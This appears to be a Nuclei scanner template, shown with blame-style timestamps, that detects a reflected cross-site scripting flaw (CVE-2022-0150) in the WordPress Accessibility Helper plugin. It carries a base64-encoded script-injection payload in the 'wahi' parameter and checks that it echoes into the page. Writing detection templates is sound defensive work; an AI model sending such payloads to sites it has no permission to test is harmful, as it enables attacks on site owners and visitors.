2022-08-06 16:54:58 +00:00
id : CVE-2022-0150
2022-02-19 11:13:05 +00:00
info :
2022-09-10 01:55:52 +00:00
name : WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting
2022-02-19 11:13:05 +00:00
author : dhiyaneshDK
2022-09-10 02:12:57 +00:00
severity : medium
2022-08-10 08:36:51 +00:00
description : |
2022-09-10 01:55:52 +00:00
WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page.
2022-04-22 10:38:41 +00:00
reference :
- https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
2022-08-25 08:56:24 +00:00
- https://plugins.trac.wordpress.org/changeset/2661008
classification :
2022-09-10 02:12:57 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-10 01:55:52 +00:00
cve-id : CVE-2022-0150
2022-09-10 02:12:57 +00:00
cwe-id : CWE-79
2023-07-15 16:29:17 +00:00
epss-score : 0.00112
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:wp_accessibility_helper_project:wp_accessibility_helper:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : wp_accessibility_helper_project
product : wp_accessibility_helper
tags : wordpress,wp-plugin,wp,wpscan,cve,cve2022,xss
2022-02-19 11:13:05 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-19 11:13:05 +00:00
- method : GET
path :
2022-02-22 07:50:05 +00:00
- '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
2022-02-19 11:13:05 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-02-22 07:50:05 +00:00
- "var wah_target_src = '';alert(document.domain);//';"
2022-02-19 11:13:05 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200